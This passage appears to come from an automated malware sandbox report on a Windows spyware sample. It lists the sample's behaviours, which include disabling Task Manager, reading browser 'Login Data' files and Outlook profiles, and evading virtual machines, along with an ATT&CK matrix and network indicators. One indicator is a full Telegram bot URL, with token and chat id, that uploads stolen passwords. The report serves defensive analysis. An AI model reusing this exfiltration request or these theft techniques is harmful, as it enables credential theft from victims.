            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594608Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594047Jump to behavior
            Source: 6ZoBPR3isG.exe, 00000000.00000002.1649332633.00000000007F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D37000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeAPI call chain: ExitProcess graph end nodegraph_0-4589
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeAPI call chain: ExitProcess graph end nodegraph_0-4746
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E49
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_73F91B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73F91B5F
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess created: C:\Users\user\Desktop\6ZoBPR3isG.exe "C:\Users\user\Desktop\6ZoBPR3isG.exe"Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeQueries volume information: C:\Users\user\Desktop\6ZoBPR3isG.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 6ZoBPR3isG.exe PID: 8068, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            6ZoBPR3isG.exe42%VirustotalBrowse
            6ZoBPR3isG.exe61%ReversingLabsWin32.Trojan.GuLoader
            6ZoBPR3isG.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.telegram.org.S0%Avira URL Cloudsafe
            https://api.telegram0%Avira URL Cloudsafe
            https://api.telegram.orgL0%Avira URL Cloudsafe
            http://checkip.dyndn0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              drive.google.com
              172.217.16.206
              truefalse
                high
                drive.usercontent.google.com
                172.217.16.129
                truefalse
                  high
                  reallyfreegeoip.org
                  104.21.80.1
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      132.226.247.73
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            http://checkip.dyndns.org/false
                              high
                              https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://checkip.dyndns.org/M6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003420D000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342EF000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=73826ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.js6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.org/U6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.orgL6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://api.telegram.org.S6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://drive.usercontent.google.com/6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.org6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342EF000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://nsis.sf.net/NSIS_ErrorError6ZoBPR3isG.exefalse
                                                  high
                                                  https://www.google.com6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://reallyfreegeoip.org6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://apis.google.com6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.com6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://api.telegram.org6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.usercontent.google.com/06ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://checkip.dyndn6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://reallyfreegeoip.org/xml/6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    149.154.167.220
                                                                    api.telegram.orgUnited Kingdom
                                                                    62041TELEGRAMRUfalse
                                                                    172.217.16.206
                                                                    drive.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.217.16.129
                                                                    drive.usercontent.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    104.21.80.1
                                                                    reallyfreegeoip.orgUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    132.226.247.73
                                                                    checkip.dyndns.comUnited States
                                                                    16989UTMEMUSfalse
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1588191
                                                                    Start date and time:2025-01-10 22:29:56 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 7m 27s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:6ZoBPR3isG.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:e8e552351ba3c8a3f713a970b114fb7b80bd6474f62a88b977fe3bc35b57e9a7.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 96%
                                                                    • Number of executed functions: 188
                                                                    • Number of non-executed functions: 111
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    TimeTypeDescription
                                                                    16:31:41API Interceptor115365x Sleep call for process: 6ZoBPR3isG.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    149.154.167.220JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                              SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        104.21.80.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.aziziyeescortg.xyz/2pcx/
                                                                                        qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.mzkd6gp5.top/0hqe/
                                                                                        6uHfmjGMfL.exeGet hashmaliciousAmadeyBrowse
                                                                                        • clientservices.sgoogleapis.observer/api/index.php
                                                                                        http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                        • my.cradaygo.com/smmylet
                                                                                        SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.dejikenkyu.cyou/pmpa/
                                                                                        SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • hiranetwork.com/administrator/index.php
                                                                                        downloader2.htaGet hashmaliciousXWormBrowse
                                                                                        • 2k8u3.org/wininit.exe
                                                                                        132.226.247.73JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        s-part-0017.t-0009.t-msedge.netiRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        7cYDC0HciP.exeGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=Get hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        7cYDC0HciP.exeGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 13.107.246.45
                                                                                        https://services221.com/mm/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.107.246.45
                                                                                        8qQwTWK3jx.exeGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        1018617432866721695.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                        • 13.107.246.45
                                                                                        https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.107.246.45
                                                                                        hm8dCK5P5A.exeGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        checkip.dyndns.comJgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 132.226.247.73
                                                                                        lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.130.0
                                                                                        V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 132.226.247.73
                                                                                        2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 132.226.247.73
                                                                                        6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 132.226.247.73
                                                                                        SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 158.101.44.242
